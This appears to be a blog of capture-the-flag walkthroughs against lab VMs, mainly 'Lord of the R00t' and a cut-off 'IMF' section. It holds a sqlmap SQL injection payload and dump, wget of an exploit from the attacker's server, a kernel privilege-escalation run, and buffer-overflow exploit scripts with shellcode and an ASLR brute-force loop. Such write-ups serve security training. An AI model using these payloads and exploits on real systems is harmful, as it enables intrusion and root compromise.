Lord of the R00t

finding the target first: (The IP will change in this walk through because I’m changing location….

Nmap scan report for 192.168.0.19
Host is up (0.00044s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE
22/tcp open ssh
MAC Address: 08:00:27:0F:EA:7E (Oracle VirtualBox virtual NIC)

Aouch just ssh?

Let’s run other scans in the meantime:

nmap -A 192.168.0.19
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-23 15:28 UTC
Nmap scan report for 192.168.0.19
Host is up (0.00035s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 3c:3d:e3:8e:35:f9:da:74:20:ef:aa:49:4a:1d:ed:dd (DSA)
| 2048 85:94:6c:87:c9:a8:35:0f:2c:db:bb:c1:3f:2a:50:c1 (RSA)
| 256 f3:cd:aa:1d:05:f2:1e:8c:61:87:25:b6:f4:34:45:37 (ECDSA)
|_ 256 34:ec:16:dd:a7:cf:2a:86:45:ec:65:ea:05:43:89:21 (ED25519)
MAC Address: 08:00:27:0F:EA:7E (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 – 4.11, Linux 3.16 – 4.6, Linux 3.2 – 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.35 ms 192.168.0.19

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Still just SSH….

OK, when the VM starts, we see that user smeagol is the default login… Let’s see if it exists…

I found this exploit in the exploitdb database:

OpenSSH 7.2p2 – Username Enumeration | exploits/linux/remote/40136.py

./40136.py
usage: 40136.py [-h] [-u USER | -U USERLIST] [-e] [-s] [–bytes BYTES]
[–samples SAMPLES] [–factor FACTOR] [–trials TRIALS]
host

And user smeagol came back as positive….

So trying to login:

ssh smeagol@192.168.1.104

.____ _____________________________
| | \_____ \__ ___/\______ \
| | / | \| | | _/
| |___/ | \ | | | \
|_______ \_______ /____| |____|_ /
\/ \/ \/
____ __. __ ___________ .__ .___ ___________ ___________ __
| |/ _| ____ ____ ____ | | __ \_ _____/______|__| ____ ____ __| _/ \__ ___/___ \_ _____/ _____/ |_ ___________
| < / \ / _ \_/ ___\| |/ / | __) \_ __ \ |/ __ \ / \ / __ | | | / _ \ | __)_ / \ __\/ __ \_ __ \
| | \| | ( <_> ) \___| < | \ | | \/ \ ___/| | \/ /_/ | | |( <_> ) | \ | \ | \ ___/| | \/
|____|__ \___| /\____/ \___ >__|_ \ \___ / |__| |__|\___ >___| /\____ | |____| \____/ /_______ /___| /__| \___ >__|
\/ \/ \/ \/ \/ \/ \/ \/ \/ \/ \/
Easy as 1,2,3
smeagol@192.168.1.104’s password:

The banner says “Knock Friend to Enter”…..

Maybe I just have to knock these ports…

root@kali:~/boxes/lordoftheroot# nmap -sT -r -p1,2,3 192.168.231.128
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-24 12:34 UTC
Nmap scan report for 192.168.231.128
Host is up (0.00069s latency).

PORT STATE SERVICE
1/tcp filtered tcpmux
2/tcp filtered compressnet
3/tcp filtered compressnet
MAC Address: 00:0C:29:1E:C1:79 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 1.35 seconds
root@kali:~/boxes/lordoftheroot# nmap -p- 192.168.231.128
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-24 12:35 UTC
Nmap scan report for 192.168.231.128
Host is up (0.00038s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE
22/tcp open ssh
1337/tcp open waste
MAC Address: 00:0C:29:1E:C1:79 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 104.45 seconds

Bingo.. got a new port: 1337

I open it in Firefox and got just an image:

Checking if there’s something in the image… Nothing:
root@kali:~/boxes/lordoftheroot# /root/tools/stegextract/stegextract mordor.png
Detected image format: PNG
No trailing data found in file
Performing deep analysis
Done

So trying to enumerate this port a little more:

nmap -Pn -T4 -sV -A -v -p 1337 192.168.231.128

And in the meantime, trying gobuster:
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt –url http://192.168.231.128:1337 > dirb.txt

The result of the nmap is not very detailed:

ORT STATE SERVICE VERSION
1337/tcp open http Apache httpd 2.4.7 ((Ubuntu))
| http-methods:
|_ Supported Methods: OPTIONS GET HEAD POST
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn’t have a title (text/html).
MAC Address: 00:0C:29:1E:C1:79 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 – 4.11, Linux 3.16 – 4.6, Linux 3.2 – 4.9
Uptime guess: 0.010 days (since Tue Sep 24 12:37:33 2019)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=264 (Good luck!)
IP ID Sequence Generation: All zeros

Let’s see what gobuster found:

root@kali:~/boxes/lordoftheroot# more dirb.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://192.168.231.128:1337
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2019/09/24 12:53:40 Starting gobuster
===============================================================
/images (Status: 301)
/server-status (Status: 403)
===============================================================
2019/09/24 12:54:20 Finished
===============================================================

Nothing again…. Maybe Nikto?

root@kali:~/boxes/lordoftheroot# nikto –url http://192.168.231.128:1337
– Nikto v2.1.6
—————————————————————————
+ Target IP: 192.168.231.128
+ Target Hostname: 192.168.231.128
+ Target Port: 1337
+ Start Time: 2019-09-24 12:56:03 (GMT0)
—————————————————————————
+ Server: Apache/2.4.7 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use ‘-C all’ to force check all possible dirs)
+ IP address found in the ‘location’ header. The IP is “127.0.1.1”.
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is “127.0.1.1”.
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: OPTIONS, GET, HEAD, POST
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7917 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time: 2019-09-24 12:56:53 (GMT0) (50 seconds)
—————————————————————————
+ 1 host(s) tested

Not much

So let’s see what’s in the image directory:

Robots.txt points to the hipster picture!

Let’s try Burp:

GET / HTTP/1.1
Host: 192.168.231.128:1337
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
If-Modified-Since: Fri, 18 Sep 2015 03:47:46 GMT
If-None-Match: “40-51ffd65196807”
Cache-Control: max-age=0

If I try

GET /legolas HTTP/1.1
Host: 192.168.231.128:1337
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
If-Modified-Since: Fri, 18 Sep 2015 03:47:46 GMT
If-None-Match: “40-51ffd65196807”
Cache-Control: max-age=0

Then I have:

HTTP/1.1 404 Not Found
Date: Tue, 24 Sep 2019 16:06:34 GMT
Server: Apache/2.4.7 (Ubuntu)
Last-Modified: Fri, 18 Sep 2015 03:47:34 GMT
ETag: “74-51ffd64576fc7″
Accept-Ranges: bytes
Content-Length: 116
Connection: close
Content-Type: text/html

<html>
<img src=”/images/hipster.jpg” align=”middle”>
<!–THprM09ETTBOVEl4TUM5cGJtUmxlQzV3YUhBPSBDbG9zZXIh>
</html>

Trying to decode the base64 message in the html comment:

Lzk3ODM0NTIxMC9pbmRleC5waHA= Closer!

Then decode again!

/978345210/index.php

I saved the result of my burp request and ran it into sqlmap:

sqlmap –batch -r burp.req

[13:17:15] [INFO] POST parameter ‘username’ appears to be ‘MySQL >= 5.0.12 AND time-based blind (query SLEEP)’ injectable
it looks like the back-end DBMS is ‘MySQL’. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for ‘MySQL’ extending provided level (1) and risk (1) values? [Y/n] Y
[13:17:15] [INFO] testing ‘Generic UNION query (NULL) – 1 to 20 columns’
[13:17:15] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
sqlmap got a 302 redirect to ‘http://192.168.231.128:1337/978345210/profile.php’. Do you want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [y/N] N
[13:17:16] [INFO] checking if the injection point on POST parameter ‘username’ is a false positive
POST parameter ‘username’ is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 74 HTTP(s) requests:

Parameter: username (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=smeagol’ AND (SELECT 7638 FROM (SELECT(SLEEP(5)))wbck) AND ‘tVTj’=’tVTj&password=motdepa&submit= Login

[13:17:31] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.0.12
[13:17:31] [INFO] fetched data logged to text files under ‘/root/.sqlmap/output/192.168.231.128’

[*] ending @ 13:17:31 /2019-09-24/

Interesting!

So let’s try to retrieve the data:

sqlmap –batch -r burp.req –dump –method POST –dbms mysql

[13:28:09] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.0.0
[13:28:09] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[13:28:09] [INFO] fetching current database
[13:28:09] [INFO] retrieved: Webapp
[13:28:29] [INFO] fetching tables for database: ‘Webapp’
[13:28:29] [INFO] fetching number of tables for database ‘Webapp’
[13:28:29] [INFO] retrieved: 1
[13:28:30] [INFO] retrieved: Users
[13:28:46] [INFO] fetching columns for table ‘Users’ in database ‘Webapp’
[13:28:46] [INFO] retrieved: 3
[13:28:49] [INFO] retrieved: id
[13:28:55] [INFO] retrieved: username
[13:29:17] [INFO] retrieved: password
[13:29:45] [INFO] fetching entries for table ‘Users’ in database ‘Webapp’
[13:29:45] [INFO] fetching number of entries for table ‘Users’ in database ‘Webapp’
[13:29:45] [INFO] retrieved: 5
[13:29:47] [WARNING] (case) time-based comparison requires reset of statistical model, please wait………………………… (done)
1
[13:29:49] [INFO] retrieved: iwilltakethering
[13:30:39] [INFO] retrieved: frodo
[13:30:57] [INFO] retrieved: 2
[13:31:00] [INFO] retrieved: MyPreciousR00t
[13:31:48] [INFO] retrieved: smeagol
[13:32:09] [INFO] retrieved: 3
[13:32:12] [INFO] retrieved: AndMySword
[13:32:50] [INFO] retrieved: aragorn
[13:33:10] [INFO] retrieved: 4
[13:33:14] [INFO] retrieved: AndMyBow
[13:33:45] [INFO] retrieved: legolas
[13:34:08] [INFO] retrieved: 5
[13:34:11] [INFO] retrieved: AndMyAxe
[13:34:40] [INFO] retrieved: gimli
Database: Webapp
Table: Users
[5 entries]
+—-+———-+——————+
| id | username | password |
+—-+———-+——————+
| 1 | frodo | iwilltakethering |
| 2 | smeagol | MyPreciousR00t |
| 3 | aragorn | AndMySword |
| 4 | legolas | AndMyBow |
| 5 | gimli | AndMyAxe |
+—-+———-+——————+

When I try these logins, they all send me to profile.php with the following picture:
file:///tmp/tmpHS7GFD/6.png

And a link to log out…

One interesting thing… It should display the login name but doesn’t:
file:///tmp/tmpHS7GFD/7.png

<b id=”welcome”>Welcome : <i></i></b>

Trying to login with ssh:

root@kali:~/boxes/lordoftheroot# ssh smeagol@192.168.231.128

.____ _____________________________
| | \_____ \__ ___/\______ \
| | / | \| | | _/
| |___/ | \ | | | \
|_______ \_______ /____| |____|_ /
\/ \/ \/
____ __. __ ___________ .__ .___ ___________ ___________ __
| |/ _| ____ ____ ____ | | __ \_ _____/______|__| ____ ____ __| _/ \__ ___/___ \_ _____/ _____/ |_ ___________
| < / \ / _ \_/ ___\| |/ / | __) \_ __ \ |/ __ \ / \ / __ | | | / _ \ | __)_ / \ __\/ __ \_ __ \
| | \| | ( <_> ) \___| < | \ | | \/ \ ___/| | \/ /_/ | | |( <_> ) | \ | \ | \ ___/| | \/
|____|__ \___| /\____/ \___ >__|_ \ \___ / |__| |__|\___ >___| /\____ | |____| \____/ /_______ /___| /__| \___ >__|
\/ \/ \/ \/ \/ \/ \/ \/ \/ \/ \/
Easy as 1,2,3
smeagol@192.168.231.128’s password:
Welcome to Ubuntu 14.04.3 LTS (GNU/Linux 3.19.0-25-generic i686)

* Documentation: https://help.ubuntu.com/

.____ _____________________________
| | \_____ \__ ___/\______ \
| | / | \| | | _/
| |___/ | \ | | | \
|_______ \_______ /____| |____|_ /
\/ \/ \/
__ __ .__ ___________ .__ .___
/ \ / \ ____ | | ____ ____ _____ ____ \_ _____/______|__| ____ ____ __| _/
\ \/\/ // __ \| | _/ ___\/ _ \ / \_/ __ \ | __) \_ __ \ |/ __ \ / \ / __ |
\ /\ ___/| |_\ \__( <_> ) Y Y \ ___/ | \ | | \/ \ ___/| | \/ /_/ |
\__/\ / \___ >____/\___ >____/|__|_| /\___ > \___ / |__| |__|\___ >___| /\____ |
\/ \/ \/ \/ \/ \/ \/ \/ \/
Last login: Tue Sep 22 12:59:38 2015 from 192.168.55.135
smeagol@LordOfTheRoot:~$

Bingo!

It seems like the other logins can’t ssh:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
messagebus:x:102:106::/var/run/dbus:/bin/false
usbmux:x:103:46:usbmux daemon,,,:/home/usbmux:/bin/false
dnsmasq:x:104:65534:dnsmasq,,,:/var/lib/misc:/bin/false
avahi-autoipd:x:105:113:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
kernoops:x:106:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
rtkit:x:107:114:RealtimeKit,,,:/proc:/bin/false
saned:x:108:115::/home/saned:/bin/false
whoopsie:x:109:116::/nonexistent:/bin/false
speech-dispatcher:x:110:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh
avahi:x:111:117:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
lightdm:x:112:118:Light Display Manager:/var/lib/lightdm:/bin/false
colord:x:113:121:colord colour management daemon,,,:/var/lib/colord:/bin/false
hplip:x:114:7:HPLIP system user,,,:/var/run/hplip:/bin/false
pulse:x:115:122:PulseAudio daemon,,,:/var/run/pulse:/bin/false
smeagol:x:1000:1000:smeagol,,,:/home/smeagol:/bin/bash
mysql:x:116:125:MySQL Server,,,:/nonexistent:/bin/false
sshd:x:117:65534::/var/run/sshd:/usr/sbin/nologin

smeagol@LordOfTheRoot:/etc$ sudo -l
[sudo] password for smeagol:
Sorry, user smeagol may not run sudo on LordOfTheRoot.

So now uploading linenum:

smeagol@LordOfTheRoot:~$ wget http://192.168.1.124:9000/linenum.sh
–2019-09-24 11:03:36– http://192.168.1.124:9000/linenum.sh
Connecting to 192.168.1.124:9000… connected.
HTTP request sent, awaiting response… 200 OK
Length: 45652 (45K) [text/x-sh]
Saving to: ‘linenum.sh’

100%[==================================================================================================================================================================>] 45,652 –.-K/s in 0.04s

2019-09-24 11:03:36 (1000 KB/s) – ‘linenum.sh’ saved [45652/45652]

smeagol@LordOfTheRoot:~$ chmod +x linenum.sh
smeagol@LordOfTheRoot:~$ ./linenum.sh -t

### SYSTEM ##############################################
[-] Kernel information:
Linux LordOfTheRoot 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:18:00 UTC 2015 i686 i686 i686 GNU/Linux

[-] Kernel information (continued):
Linux version 3.19.0-25-generic (buildd@lgw01-57) (gcc version 4.8.2 (Ubuntu 4.8.2-19ubuntu1) ) #26~14.04.1-Ubuntu SMP Fri Jul 24 21:18:00 UTC 2015

[-] Specific release information:
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=14.04
DISTRIB_CODENAME=trusty
DISTRIB_DESCRIPTION=”Ubuntu 14.04.3 LTS”
NAME=”Ubuntu”
VERSION=”14.04.3 LTS, Trusty Tahr”
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME=”Ubuntu 14.04.3 LTS”
VERSION_ID=”14.04″
HOME_URL=”http://www.ubuntu.com/”
SUPPORT_URL=”http://help.ubuntu.com/”
BUG_REPORT_URL=”http://bugs.launchpad.net/ubuntu/”

Looking for an exploit for this old Ubuntu:

Linux Kernel 4.3.3 (Ubuntu 14.04/15.10) – ‘overlayfs’ Local Privilege Escalation (1) | exploits/linux/local/39166.c
root@kali:~/boxes/lordoftheroot/SECRET# cd /usr/share/exploitdb/exploits/linux/local/
root@kali:/usr/share/exploitdb/exploits/linux/local# dos2unix 39166.c

Starting a python http server and transfering the file:

smeagol@LordOfTheRoot:~$ wget http://192.168.1.124:9000/39166.c
–2019-09-25 11:46:01– http://192.168.1.124:9000/39166.c
Connecting to 192.168.1.124:9000… connected.
HTTP request sent, awaiting response… 200 OK
Length: 2680 (2.6K) [text/plain]
Saving to: ‘39166.c’

100%[===========================================================================================================================================>] 2,680 –.-K/s in 0s

2019-09-25 11:46:01 (324 MB/s) – ‘39166.c’ saved [2680/2680]

smeagol@LordOfTheRoot:~$ vi 39166.c
smeagol@LordOfTheRoot:~$ gcc 39166.c -o exploit
smeagol@LordOfTheRoot:~$ chmod +x exploit
smeagol@LordOfTheRoot:~$ ./exploit

root@LordOfTheRoot:~# whoami
root
root@LordOfTheRoot:~# id
uid=0(root) gid=1000(smeagol) groups=0(root),1000(smeagol)

root@LordOfTheRoot:/root# cat Flag.txt
“There is only one Lord of the Ring, only one who can bend it to his will. And he does not share power.”
– Gandalf

Now there was a buffer overflow possible in the /SECRET directory… but the vulnerable file kept changing location.
I thought I had the right one but failed to find the adress where to inject my code.

But this script explains why it kept changing!

root@LordOfTheRoot:/root# cat switcher.py
#!/usr/bin/python
import os
from random import randint

targets= [“/SECRET/door1/”,”/SECRET/door2/”,”/SECRET/door3/”]
for t in targets:
os.system(“rm “+t+”*”)
os.system(“cp -p other “+t)
os.system(“cp -p “+t+”other “+t+”file”)
os.system(“rm “+t+”other”)

luckyDoor = randint(0,2)
t=targets[luckyDoor]
os.system(“rm “+t+”*”)
os.system(“cp -p buf “+t)
os.system(“cp -p “+t+”buf “+t+”file”)
os.system(“rm “+t+”buf”)

But I still need to figure out why my BOF didn’t work….
ASLR was enable, that one thing. But still … It should have worked!
I’ll try again latter

 

 

————————————————————————————————–

OK.. after a good night I’m back at the BOF part…

I already knew the buffer size, so let’s code the exploit directly:

root@kali:~/boxes/lordoftheroot# cat exploit.py
#!/usr/bin/python
nops = ‘\x90’ *64
shellcode = “\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80”
pad = ‘A’ * (171 – 64 -32) #Buffer minus pad minus shellcode length
eip = ‘1234’
print nops + shellcode + pad + eip

gdb-peda$ run $(cat e3)
Starting program: /root/boxes/lordoftheroot/file $(cat e3)

Program received signal SIGSEGV, Segmentation fault.
[———————————-registers———————————–]
EAX: 0x0
EBX: 0x0
ECX: 0xffffd560 (“AAAAAAA1234”)
EDX: 0xffffd265 (“AAAAAAA1234”)
ESI: 0xf7fa3000 –> 0x1d9d6c
EDI: 0xf7fa3000 –> 0x1d9d6c
EBP: 0x41414141 (‘AAAA’)
ESP: 0xffffd270 –> 0x0

EIP: 0x34333231 (‘1234’)

EFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[————————————-code————————————-]
Invalid $PC address: 0x34333231
[————————————stack————————————-]
0000| 0xffffd270 –> 0x0
0004| 0xffffd274 –> 0xffffd304 –> 0xffffd49d (“/root/boxes/lordoftheroot/file”)
0008| 0xffffd278 –> 0xffffd310 –> 0xffffd56c (“SHELL=/bin/bash”)
0012| 0xffffd27c –> 0xffffd294 –> 0x0
0016| 0xffffd280 –> 0x1
0020| 0xffffd284 –> 0x0
0024| 0xffffd288 –> 0xf7fa3000 –> 0x1d9d6c
0028| 0xffffd28c –> 0xffffffff
[——————————————————————————]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x34333231 in ?? ()
gdb-peda$ infor registers
Undefined command: “infor”. Try “help”.
gdb-peda$ info registers
eax 0x0 0x0
ecx 0xffffd560 0xffffd560
edx 0xffffd265 0xffffd265
ebx 0x0 0x0
esp 0xffffd270 0xffffd270
ebp 0x41414141 0x41414141
esi 0xf7fa3000 0xf7fa3000
edi 0xf7fa3000 0xf7fa3000
eip 0x34333231 0x34333231
eflags 0x10202 [ IF RF ]
cs 0x23 0x23
ss 0x2b 0x2b
ds 0x2b 0x2b
es 0x2b 0x2b
fs 0x0 0x0
gs 0x63 0x63

gdb-peda$ info frame
Stack level 0, frame at 0xffffd274:
eip = 0x34333231; saved eip = 0x0
called by frame at 0xffffd278
Arglist at 0xffffd26c, args:

Locals at 0xffffd26c, Previous frame’s sp is 0xffffd274

Saved registers:
eip at 0xffffd270

So now I control the EIP….

And I have the jump:0xffffd274

import struct
pad = “\x41” *171
EIP = struct.pack(“I”,0xffffd274)
shellcode = “\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80”
NOP = “\x90” * 64
print pad + EIP + NOP + shellcode

On Kali, it works because ASLR is disabled:

root@kali:~/boxes/lordoftheroot# ./file $(python exploit2.py)
# id
uid=0(root) gid=0(root) groups=0(root)
# exit

But on the target, I cannot disable ASLR….

So let’s do it differently:

The process is very well documented here: https://hacked0x90.wordpress.com/2016/10/30/bypassing-aslr-protection-using-brute-force/

First we need to find an address to use…

This small piece of C will dot it for us:

#include <stdlib.h>
int main (int argc, char *argv[]) {
char *addr;
printf(“%p\n”,&addr);
return 0;
}

Compile with gcc -m32

Then execute it and it will give an address to use.
Update the exploit below with this address and run ls -alR /SECRET to see where is the vulnerable executable.
Update quickly the exploit and run it

#!/usr/bin/python
import os
i=1
while True:
eipOffset = 171
RandomAddress = ‘\x8c\x4c\x95\xff’
nopSleds = 20480
shellcode = ‘\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80’
exploit = (‘A’ * eipOffset) + RandomAddress + (‘\x90’ * nopSleds) + shellcode
print “BruteForce ASLR Trial Number ” + str(i)
os.system(“/root/boxes/lordoftheroot/file” + ‘ ‘ + exploit)
i=i+1

Bam! root after 361 iterations!

IMF – Impossible Mission Force

Very nice machine! A lot of different techniques involved there….

finding the target first:

root@kali:~# nmap -Pn -T4 192.168.1.0/24

Nmap scan report for imf.lan (192.168.1.234)
Host is up (0.00037s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE
80/tcp open http
MAC Address: 08:00:27:B1:4D:87 (Oracle VirtualBox virtual NIC)

Then lauching an intensive scan while I inspect the website:

It shows only port 80 …

PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: IMF – Homepage
MAC Address: 08:00:27:B1:4D:87 (Oracle VirtualBox virtual NIC)

 

Except one contact form, not much for now… So let’s enumerate:

root@kali:~# gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt –url http://192.168.1.234
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://192.168.1.234
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2019/09/18 13:00:36 Starting gobuster
===============================================================
/images (Status: 301)
/css (Status: 301)
/js (Status: 301)
/fonts (Status: 301)
/less (Status: 301)
/server-status (Status: 403)
===============================================================
2019/09/18 13:01:40 Finished
===============================================================

root@kali:~# nikto -url http://192.168.1.234
– Nikto v2.1.6
—————————————————————————
+ Target IP: 192.168.1.234
+ Target Hostname: 192.168.1.234
+ Target Port: 80
+ Start Time: 2019-09-18 13:04:33 (GMT0)
—————————————————————————
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use ‘-C all’ to force check all possible dirs)
+ IP address found in the ‘location’ header. The IP is “127.0.1.1”.
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is “127.0.1.1”.
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 8 item(s) reported on remote host
+ End Time: 2019-09-18 13:05:22 (GMT0) (49 seconds)
—————————————————————————

Checking if a flag is in the images:

root@kali:~/boxes/imf# /root/tools/stegextract/stegextract roundlogo.png
Detected image format: PNG
No trailing data found in file
Performing deep analysis
Done

root@kali:~/boxes/imf# /root/tools/stegextract/stegextract brain.jpg
Detected image format: JPG
No trailing data found in file
Performing deep analysis
Done

Nothing there, so trying the contact form with burp:

POST /contact.php HTTP/1.1
Host: 192.168.1.234
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.234/contact.php

Content-Type: application/x-www-form-urlencoded
Content-Length: 57
Connection: close
Upgrade-Insecure-Requests: 1

email=erik%40erik.com&name=philippe&comments=test+comment

Trying different options but no results for now…

But I just thought about something! The first flag is Base64 encoded!

If I decode it, I have:
allthefiles

So let’s try this :

http://192.168.1.234/allthefiles

Crap 404 not found!

Changing IP range due to a location change… target is now 192.168.0.18
and my Kali is 192.168.0.11

root@kali:~/boxes/imf# dotdotpwn -m http -h 192.168.1.18 -M POST
#################################################################################
# #
# CubilFelino Chatsubo #
# Security Research Lab and [(in)Security Dark] Labs #
# chr1x.sectester.net chatsubo-labs.blogspot.com #
# #
# pr0udly present: #
# #
# ________ __ ________ __ __________ #
# \______ \ ____ _/ |_\______ \ ____ _/ |_\______ \__ _ __ ____ #
# | | \ / _ \\ __\| | \ / _ \\ __\| ___/\ \/ \/ // \ #
# | ` \( <_> )| | | ` \( <_> )| | | | \ /| | \ #
# /_______ / \____/ |__| /_______ / \____/ |__| |____| \/\_/ |___| / #
# \/ \/ \/ #
# – DotDotPwn v3.0.2 – #
# The Directory Traversal Fuzzer #
# http://dotdotpwn.sectester.net #
# dotdotpwn@sectester.net #
# #
# by chr1x & nitr0us #
#################################################################################

[+] Report name: Reports/192.168.1.18_09-19-2019_10-21.txt

[========== TARGET INFORMATION ==========]
[+] Hostname: 192.168.1.18
[+] Protocol: http
[+] Port: 80

